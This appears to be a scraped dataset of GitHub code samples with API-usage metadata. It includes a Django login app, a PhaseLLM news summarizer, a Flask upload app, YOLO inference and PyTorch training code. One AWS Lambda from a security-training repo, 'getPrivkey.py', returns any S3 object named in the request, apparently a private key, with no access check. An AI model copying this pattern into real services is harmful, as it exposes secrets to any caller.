"line_number": 39, "usage_type": "attribute"}, {"api_name": "SafeLogin.settings", "line_number": 39, "usage_type": "name"}, {"api_name": "settings.STATUS_CODE", "line_number": 41, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "models.user.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.user.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.user", "line_number": 45, "usage_type": "name"}, {"api_name": "models.inactivatedUser.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.inactivatedUser.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.inactivatedUser", "line_number": 45, "usage_type": "name"}, {"api_name": "settings.STATUS_CODE", "line_number": 46, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 50, "usage_type": "call"}, {"api_name": "string.digits", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tools.emailSender.sendEmailForUserRegister", "line_number": 52, "usage_type": "call"}, {"api_name": "SafeLogin.settings.DEBUG", "line_number": 54, "usage_type": "attribute"}, {"api_name": "SafeLogin.settings", 
"line_number": 54, "usage_type": "name"}, {"api_name": "settings.STATUS_CODE", "line_number": 56, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 57, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "models.inactivatedUser", "line_number": 60, "usage_type": "call"}, {"api_name": "settings.STATUS_CODE", "line_number": 64, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 65, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 33, "usage_type": "name"}, {"api_name": "models.inactivatedUser.objects.filter", "line_number": 73, "usage_type": "call"}, {"api_name": "models.inactivatedUser.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "models.inactivatedUser", "line_number": 73, "usage_type": "name"}, {"api_name": "models.user", "line_number": 76, "usage_type": "call"}, {"api_name": "settings.STATUS_CODE", "line_number": 80, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 81, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 81, "usage_type": "call"}, {"api_name": "settings.STATUS_CODE", "line_number": 82, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 83, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 83, "usage_type": "call"}, {"api_name": "SafeLogin.settings.DEBUG", "line_number": 95, "usage_type": "attribute"}, {"api_name": "SafeLogin.settings", "line_number": 95, "usage_type": "name"}, {"api_name": "settings.STATUS_CODE", "line_number": 97, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 98, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 98, "usage_type": "call"}, {"api_name": "settings.STATUS_CODE", "line_number": 110, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 111, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 111, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 89, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 153, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 156, "usage_type": "call"}, {"api_name": "rsa.decrypt", "line_number": 157, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 157, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 158, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 158, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 158, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 164, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 164, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 164, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 170, "usage_type": "call"}]} +{"seq_id": "21149437556", "text": "import json\nimport boto3\nimport os\n\n#Setting default values\nregion=\"us-east-1\"\n\ndef lambda_handler(event, context):\n\n try:\n print(\"Event received from Lambda's trigger \" + str(event))\n \n #Parameters from Lambda test event or API Gateway trigger\n if 'objectname' in event: object_name = event.get('objectname')\n else: object_name = json.loads(event['body']).get('objectname')\n if 's3' in event: s3_bucket = 
event.get('s3')\n else: s3_bucket = json.loads(event['body']).get('s3')\n\n \n s3 = boto3.client(\"s3\")\n \n response = s3.get_object(Bucket=s3_bucket, Key=object_name)\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(response[\"Body\"].read().decode())\n }\n except Exception as error:\n return {\n \"statusCode\": 500,\n \"body\": json.dumps({\"message\": str(error)})\n }", "repo_name": "lautmat/trainingdemo-secaws", "sub_path": "video 2.3/getPrivkey.py", "file_name": "getPrivkey.py", "file_ext": "py", "file_size_in_byte": 915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 20, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "11734564164", "text": "### IMPORTS \n\nfrom phasellm.llms import OpenAIGPTWrapper, ClaudeWrapper, ChatPrompt\nfrom phasellm.agents import NewsSummaryAgent\nimport json \n\n### ENVIRONMENT VARIABLES\n\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\nopenai_api_key = os.getenv(\"OPENAI_API_KEY\")\nanthropic_api_key = os.getenv(\"ANTHROPIC_API_KEY\")\nnews_api_api_key = os.getenv(\"NEWS_API_API_KEY\")\n\n### SETUP THE EXPERIMENTAL DATA\n\nqueries = ['spacex', 'federal reserve', 'shopify', 'openai', 'biden', 'trump', 'met gala', 'king charles', 'poland', 'euro']\nJSON_FILE = \"news_articles.json\"\n\nllm_1 = OpenAIGPTWrapper(openai_api_key, model=\"gpt-4\")\nllm_2 = OpenAIGPTWrapper(openai_api_key, model=\"gpt-4\") # ClaudeWrapper(anthropic_api_key)\n\nchat_prompt_raw_1 = [\n{\"role\":\"system\",\n \"content\": \"You are a helpful news summarizer. We will provide you with a list of news articles and will ask that you summarize them and retain links to source by adding footnotes. For example, if you have a news article describing XYZ and URL to the article, you would discuss XYZ[1] and add '[1] URL' to the bottom of the message. Note that the footnotes should be counted as of the summary; you do not need to keep the numbers from the earlier order, just from your summary. In other words, footnotes should start at 1, 2, 3, etc...\"},\n{\"role\":\"user\",\n \"content\": \"The articles below are about '{query}'. Please summarize them into a short paragraph with link retained as per the earlier instructions.\\n\\n{news_articles}\"},\n]\n\nchat_prompt_raw_2 = [\n{\"role\":\"system\",\n \"content\": \"You are a helpful news summarizer. We will provide you with a list of news articles and will ask that you summarize them and retain links to source by adding footnotes. For example, if you have a news article describing XYZ and URL to the article, you would discuss XYZ[1] and add '[1] URL' to the bottom of the message. The footnote numbers should start at [1] and increase consecutively. In other words, footnotes should start at 1, 2, 3, etc. For the actual paragraph, you can reorder reference articles and choose the ones to include as to make the paragraph as informative, pithy, and concise as possible. You can also have multiple footnotes per sentence if this helps tell the story. 
While you should avoid adding your own commentary in most cases, feel free to do so if it will help the reader understand the context of the paragraph you are writing.\"},\n{\"role\":\"user\",\n \"content\": \"The articles below are about '{query}'. Please take on the role of an entertaining, successful, AI-driven investigative journalists and summarize them into a short paragraph. Make sure to follow the 'system' instructions.\\n\\n{news_articles}\"},\n]\n\nchat_prompt_1 = ChatPrompt(chat_prompt_raw_1)\nchat_prompt_2 = ChatPrompt(chat_prompt_raw_2)\n\n### DATA HELPERS\n\ndef create_data_set(queries, json_file):\n article_dict = {}\n news_agent = NewsSummaryAgent(news_api_api_key, name=\"tester agent\")\n for query in queries:\n news_articles = news_agent.getQuery(query, days_back=1, include_descriptions=True, max_articles=30)\n article_dict[query] = {\"articles\":news_articles}\n\n update_data_set(article_dict, json_file)\n\ndef update_data_set(dict_obj, json_file):\n with open(json_file, 'w') as writer:\n writer.write(json.dumps(dict_obj))\n\ndef load_data_set(json_file):\n articles = None\n with open(json_file, 'r') as reader:\n articles = json.loads(reader.read())\n return articles\n\n### RUNNING DATA SET CREATION\n\ncreate_data_set(queries, JSON_FILE)\n\narticles = load_data_set(JSON_FILE)\nfor query, article_dict in articles.items():\n\n print(f\"Generating news summary for '{query}'\")\n\n print(\"... llm_1\")\n llm_1_completion = llm_1.complete_chat(chat_prompt_1.fill(query=query, news_articles=article_dict['articles']))\n\n print(\"... llm_2\")\n llm_2_completion = llm_2.complete_chat(chat_prompt_2.fill(query=query, news_articles=article_dict['articles']))\n \n # Saving results...\n article_dict[\"llm_1\"] = llm_1_completion\n article_dict[\"llm_2\"] = llm_2_completion\n articles[query] = article_dict\n\nupdate_data_set(articles, JSON_FILE)", "repo_name": "wgryc/phasellm", "sub_path": "demos-and-products/newsbot/newsbot_create.py", "file_name": "newsbot_create.py", "file_ext": "py", "file_size_in_byte": 4116, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 426, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}, {"api_name": "phasellm.llms.OpenAIGPTWrapper", "line_number": 22, "usage_type": "call"}, {"api_name": "phasellm.llms.OpenAIGPTWrapper", "line_number": 23, "usage_type": "call"}, {"api_name": "phasellm.llms.ChatPrompt", "line_number": 39, "usage_type": "call"}, {"api_name": "phasellm.llms.ChatPrompt", "line_number": 40, "usage_type": "call"}, {"api_name": "phasellm.agents.NewsSummaryAgent", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "38771598060", "text": "from flask import Flask, render_template, request, flash\nfrom flask.helpers import url_for\nfrom markupsafe import Markup\nfrom werkzeug.utils import redirect, secure_filename\nimport os\n\nfrom Backend.data_processing import *\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config[\"SECRET_KEY\"] = os.urandom(24)\napp.config['TEMPLATES_AUTO_RELOAD'] = True\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nUPLOAD_ROOT = 'Backend/experimental_data/'\nUPLOAD_FOLDER = 
os.path.join(BASE_DIR, UPLOAD_ROOT)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nexp_design = {'data_file': None, \"significance\": None, 'iv': None, 'dv': None}\n\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n if exp_design['data_file'] is None:\n # default value for no file uploaded\n return render_template('index.html', data_file = \"No file, please choose a file to upload\")\n return render_template('index.html', data_file = exp_design['data_file'])\n\n# file operations, check that file is selected before carrying out action of upload or deletion\n@app.route(\"/upload\", methods = ['POST'])\ndef upload():\n if request.method == 'POST':\n file = request.files['experimental_data']\n if file.filename == '':\n flash(Markup(' Error: No file selected, please choose a file to upload'))\n return redirect(url_for('index'))\n\n filename = secure_filename(file.filename)\n exp_design['data_file'] = filename\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n flash('File upload successful')\n return redirect(url_for('index'))\n else:\n flash('File not uploaded. Please try again')\n return redirect(url_for('index'))\n\n@app.route(\"/del_file\", methods = [\"POST\"])\ndef del_file():\n # check if there is actually a file to delete, if there is no file just return index, \n # ensures that pressing this button will have no action if pressed by accident\n if exp_design['data_file'] is None:\n flash('No file to delete')\n return redirect(url_for('index'))\n # find file and delete, also need to notify the user of this happening\n filename = exp_design['data_file']\n exp_design['data_file'] = None\n cur_file = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n os.remove(cur_file)\n flash('File deleted')\n return redirect(url_for('index'))\n\ndef design():\n d = read_exp_design()\n exp_design['significance'] = d['significance']\n exp_design['iv'] = d['iv'].lower().replace(\" \", \"\")\n exp_design['dv'] = d['dv'].lower().replace(\" \", \"\")\n\ndef run_stats():\n # generates the report, need to run the analysis to get the stats and visualisation\n # also get the p-val from inferential stats to compare against the level given by user\n result = run_analysis(exp_design)\n p_val = get_p()\n if p_val < exp_design[\"significance\"]:\n s = True\n else:\n s = False\n\n return {\"result\": result[\"stats\"], \"vis\": result[\"vis\"], \"s\": s}\n\n@app.route('/create_report', methods = [\"GET\", \"POST\"])\ndef create_report():\n # checking that experimental data exists, first we check for file, if no file then error given\n if request.method == \"POST\":\n if exp_design['data_file'] is None:\n flash(Markup('Error: No experimental data, please upload file'))\n return redirect(url_for('index'))\n\n design()\n\n # check that experimental design exists, if either iv or dv not given then error thrown\n if len(exp_design['iv']) == 0 or len(exp_design['dv']) == 0:\n flash(Markup('Error: Variables missing, please input variables and try again'))\n return redirect(url_for('index'))\n \n return render_template('create-report.html')\n else:\n return render_template('create-report.html')\n\n# generate final report\n@app.route('/report', methods = ['GET', 'POST'])\ndef report():\n if request.method == \"POST\":\n res = run_stats()\n return render_template('report.html', stats=res['result'], vis = res[\"vis\"], significant = res['s'])\n else:\n # if no report is present, just send empty values\n return render_template('report.html', stats = {}, vis = None, significant = None)\n\n\nif __name__ == 
\"__main__\":\n app.run()", "repo_name": "MFStevenson/IndividualProject", "sub_path": "app/src/main/python/UI/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 34, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 34, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 35, "usage_type": "call"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 40, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 43, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 51, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 58, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 84, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 84, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 91, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 91, "usage_type": 
"call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 101, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "32589173839", "text": "# This code sample using onnxruntime packege by Microsoft (It's only provided for Linux)\n#\n\nimport numpy as np\nimport onnxruntime as rt\nfrom PIL import Image,ImageDraw\nsess = rt.InferenceSession(\"tiny_yolov2/model.onnx\")\ninput_name = sess.get_inputs()[0].name\n\nimg = Image.open('test.jpg')\nimg = img.resize((416, 416)) #for tiny_yolov2\n\nX = np.asarray(img)\nX = X.transpose(2,0,1)\nX = X.reshape(1,3,416,416)\nprint(X.shape)\n\nprint(input_name)\nout = sess.run(None, {input_name: X.astype(np.float32)})\nprint(out[0].shape)\nout = out[0][0]\n\nnumClasses = 20\nanchors = [1.08, 1.19, 3.42, 4.41, 6.63, 11.38, 9.42, 5.11, 16.62, 10.52]\n\ndef sigmoid(x, derivative=False):\n return x*(1-x) if derivative else 1/(1+np.exp(-x))\n\ndef softmax(x):\n\tscoreMatExp = np.exp(np.asarray(x))\n\treturn scoreMatExp / scoreMatExp.sum(0)\n\nclut = [(0,0,0),(255,0,0),(255,0,255),(0,0,255),(0,255,0),(0,255,128),\n\t\t(128,255,0),(128,128,0),(0,128,255),(128,0,128),\n\t\t(255,0,128),(128,0,255),(255,128,128),(128,255,128),(255,255,0),\n\t\t(255,0,128),(128,0,255),(255,128,128),(128,255,128),(255,255,0),\n\t\t]\nprint(len(clut))\nlabel = [\"aeroplane\",\"bicycle\",\"bird\",\"boat\",\"bottle\",\n \"bus\",\"car\",\"cat\",\"chair\",\"cow\",\"diningtable\",\"dog\",\"horse\",\n \"motorbike\",\"person\",\"pottedplant\",\"sheep\",\"sofa\",\"train\",\"tvmonitor\"]\n\n\ndraw = ImageDraw.Draw(img)\nfor cy in range(0,13):\n\tfor cx in range(0,13):\n\t\tfor b in range(0,5):\n\t\t\tchannel = b*(numClasses+5)\n\t\t\ttx = out[channel ][cy][cx]\n\t\t\tty = out[channel+1][cy][cx]\n\t\t\ttw = out[channel+2][cy][cx]\n\t\t\tth = out[channel+3][cy][cx]\n\t\t\ttc = out[channel+4][cy][cx]\n\n\t\t\tx = (float(cx) + sigmoid(tx))*32\n\t\t\ty = (float(cy) + sigmoid(ty))*32\n\t\t\t\n\t\t\tw = np.exp(tw) * 32 * anchors[2*b ]\n\t\t\th = np.exp(th) * 32 * anchors[2*b+1]\t\n\t\t\t\n\t\t\tconfidence = sigmoid(tc)\n\n\t\t\tclasses = np.zeros(numClasses)\n\t\t\tfor c in range(0,numClasses):\n\t\t\t\tclasses[c] = out[channel + 5 +c][cy][cx]\n\t\t\tclasses = softmax(classes)\n\t\t\tdetectedClass = classes.argmax()\n\n\t\t\tif 0.5< classes[detectedClass]*confidence:\n\t\t\t\tcolor =clut[detectedClass]\n\t\t\t\tprint(detectedClass,label[detectedClass],classes[detectedClass]*confidence)\n\t\t\t\tx = x - w/2\n\t\t\t\ty = y - h/2\n\t\t\t\tdraw.line((x ,y ,x+w,y ),fill=color)\n\t\t\t\tdraw.line((x ,y ,x ,y+h),fill=color)\n\t\t\t\tdraw.line((x+w,y ,x+w,y+h),fill=color)\n\t\t\t\tdraw.line((x ,y+h,x+w,y+h),fill=color)\n\nimg.save(\"result.png\")\n", "repo_name": "shi3z/onnx-example", "sub_path": "yolo-ms-onnxruntime.py", "file_name": "yolo-ms-onnxruntime.py", "file_ext": "py", "file_size_in_byte": 2333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "onnxruntime.InferenceSession", 
"line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 30, "usage_type": "call"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "39958181177", "text": "import torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom validation import _AccuracyMeter, OneHotAccuracy\nfrom session import LossMeter, EvalModel\nfrom callbacks import *\nimport util\nfrom Loss.triplet import *\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm_notebook as tqdm\nimport numpy as np\n\nclass SelectiveSequential(nn.Module):\n def __init__(self, to_select, modules_dict):\n super(SelectiveSequential, self).__init__()\n for key, module in modules_dict.items():\n self.add_module(key, module)\n self._to_select = to_select\n \n def forward(self, x):\n list = []\n for name, module in self._modules.items():\n x = module(x)\n if name in self._to_select:\n list.append((x, name))\n return list\n\nclass CustomOneHotAccuracy(OneHotAccuracy):\n def __init__(self):\n super().__init__()\n self.reset()\n\n def update(self, output, label):\n return super().update(output[-1][0], label)\n\nclass EmbeddingSpaceValidator(TrainCallback):\n def __init__(self, val_data, select, accuracy_meter_fn, model_file=None):\n self.val_data = val_data\n self.val_accuracy_meter = accuracy_meter_fn()\n self.train_accuracy_meter = accuracy_meter_fn()\n self.select=select\n self.names=[\"\" for x in range(len(self.select) - 1)]\n \n self.train_accuracies = []\n self.batch_train_accuracies = []\n self.val_accuracies = []\n \n self.train_losses = []\n self.batch_train_losses = []\n self.train_raw_losses = []\n self.val_losses = []\n self.val_raw_losses = []\n \n self.batch_train_embedding_losses = [[] for x in range(len(self.select) - 1)]\n self.train_embedding_losses = [[] for x in range(len(self.select) - 1)]\n \n self.train_embedding_loss_meters = [LossMeter() for x in range(len(self.select) - 1)]\n self.val_embedding_losses = [[] for x in range(len(self.select) - 1)]\n \n self.num_batches = 0\n self.num_epochs = 0\n \n self.epochs = []\n\n self.model_file = model_file\n\n self.best_accuracy = 0\n\n def run(self, session, lossMeter=None):\n self.val_accuracy_meter.reset()\n \n val_loss = LossMeter()\n val_raw_loss = LossMeter()\n embedding_losses = [LossMeter() for x in range(len(self.select) - 1)]\n \n with EvalModel(session.model):\n for input, label, *_ in tqdm(self.val_data, desc=\"Validating\", leave=False):\n label = Variable(util.to_gpu(label))\n output = session.forward(input)\n \n step_loss = session.criterion(output, label).data.cpu()\n \n val_loss.update(step_loss, input.shape[0])\n \n val_raw_loss.update(F.multi_margin_loss(output[-1][0], label).data.cpu(), input.shape[0])\n \n 
self.val_accuracy_meter.update(output, label)\n\n for idx, (layer, embedding_loss) in enumerate(zip(output[:-1], embedding_losses)): \n if layer[1] in self.select:\n self.names[idx] = layer[1]\n embedding_loss.update(batch_all_triplet_loss(layer[0].view(layer[0].size(0), -1), label, 1).data.cpu())\n \n self.val_losses.append(val_loss.raw_avg.item())\n self.val_raw_losses.append(val_raw_loss.raw_avg.item())\n \n accuracy = self.val_accuracy_meter.accuracy()\n\n if self.model_file != None and accuracy > self.best_accuracy:\n session.save(self.model_file)\n self.best_accuracy = accuracy\n \n self.val_accuracies.append(accuracy)\n \n for meter, loss in zip(embedding_losses, self.val_embedding_losses):\n loss.append(meter.raw_avg) \n \n def on_epoch_begin(self, session):\n self.train_accuracy_meter.reset() \n self.train_raw_loss_meter = LossMeter()\n \n def on_epoch_end(self, session, lossMeter): \n self.train_accuracies.append(self.train_accuracy_meter.accuracy())\n self.train_losses.append(lossMeter.debias.data.cpu().item())\n \n self.train_raw_losses.append(self.train_raw_loss_meter.raw_avg.data.cpu().item())\n \n self.run(session, lossMeter) \n self.epochs.append(self.num_batches)\n self.num_epochs += 1\n \n for meter, loss in zip(self.train_embedding_loss_meters, self.train_embedding_losses):\n loss.append(meter.raw_avg)\n meter.reset()\n \n print(\"\\nval accuracy: \", round(self.val_accuracies[-1], 4),\n \"\\ntrain loss: \", round(self.train_losses[-1], 4) , \n \" train cross entropy loss : \", round(self.train_raw_losses[-1], 4) , \n \"\\nvalid loss: \", round(self.val_losses[-1], 4), \n \" valid cross entropy loss : \", round(self.val_raw_losses[-1], 4))\n \n def on_batch_end(self, session, lossMeter, output, label):\n label = Variable(util.to_gpu(label))\n batch_accuracy = self.train_accuracy_meter.update(output, label)\n self.batch_train_accuracies.append(batch_accuracy)\n self.batch_train_losses.append(lossMeter.loss.data.cpu().item()) \n self.train_raw_loss_meter.update(F.multi_margin_loss(output[-1][0], label).data.cpu(), label.shape[0])\n \n for layer, loss_meter in zip(output[:-1], self.train_embedding_loss_meters):\n if layer[1] in self.select:\n loss_meter.update(batch_all_triplet_loss(layer[0].view(layer[0].size(0), -1), label, 1).data.cpu().item())\n \n self.num_batches += 1\n \n def plot(self, title=\"\", file=None):\n fig, (ax1, ax2, ax3, ax4) = plt.subplots(nrows=4, ncols=1, figsize=(15, 15))\n\n fig.suptitle(f\"{title} : Best Accuracy {np.max(self.val_accuracies)}\", fontsize=14)\n \n ax1.set_title(f\"Accuracy per Iteration\")\n\n ax1.plot(self.epochs, self.train_accuracies, label=\"Training\")\n\n ax1.plot(self.epochs, self.val_accuracies, label=\"Validation\")\n\n ax2.set_title(f\"Loss per Iteration\")\n \n ax2.plot(self.epochs, self.train_losses, label=\"Training\")\n \n ax2.plot(self.epochs, self.val_losses, label=\"Validation\")\n\n ax3.set_title(f\"Multi-class Hinge Loss per Iteration\")\n \n ax3.plot(self.epochs, self.train_raw_losses, label=\"Training\")\n \n ax3.plot(self.epochs, self.val_raw_losses, label=\"Validation\")\n \n ax4.set_title(\"Triplet Loss per Iteration\")\n\n for embedding, name in zip(self.train_embedding_losses, self.names):\n ax4.plot(self.epochs, embedding, label=f\"Training: {name}\")\n \n for embedding, name in zip(self.val_embedding_losses, self.names):\n ax4.plot(self.epochs, embedding, label=f\"Validation: {name}\")\n \n for ax in (ax1, ax2, ax3, ax4):\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, 
box.height])\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5)) \n\n plt.show()\n\n if file is not None: fig.savefig(file)\n\n\ndef tensorboard_embeddings(model, select, dataloader, targets, images, board='./runs'):\n old_select = model._to_select\n model._to_select = select\n writer = SummaryWriter(board)\n \n outputs = {name: [] for name in select}\n \n with EvalModel(model):\n for input, label in dataloader:\n output = model.forward(Variable(util.to_gpu(input)))\n for layer in output: \n outputs[layer[1]].append(layer[0].data.cpu().view(layer[0].size(0), -1)) \n \n for name, output in outputs.items():\n cat = torch.cat(output)\n writer.add_embedding(cat, tag=name, metadata=targets, label_img=images)\n", "repo_name": "drakesvoboda/deep.lib.anonymous", "sub_path": "Models/selective_sequential.py", "file_name": "selective_sequential.py", "file_ext": "py", "file_size_in_byte": 8022, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "validation.OneHotAccuracy", "line_number": 29, "usage_type": "name"}, {"api_name": "session.LossMeter", "line_number": 58, "usage_type": "call"}, {"api_name": "session.LossMeter", "line_number": 73, "usage_type": "call"}, {"api_name": "session.LossMeter", "line_number": 74, "usage_type": "call"}, {"api_name": "session.LossMeter", "line_number": 75, "usage_type": "call"}, {"api_name": "session.EvalModel", "line_number": 77, "usage_type": "call"}, {"api_name": "session.model", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 78, "usage_type": "call"}, {"api_name": "util.to_gpu", "line_number": 79, "usage_type": "call"}, {"api_name": "session.forward", "line_number": 80, "usage_type": "call"}, {"api_name": "session.criterion", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.functional.multi_margin_loss", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 86, "usage_type": "name"}, {"api_name": "session.save", "line_number": 101, "usage_type": "call"}, {"api_name": "session.LossMeter", "line_number": 111, "usage_type": "call"}, {"api_name": "util.to_gpu", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn.functional.multi_margin_loss", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn.functional", 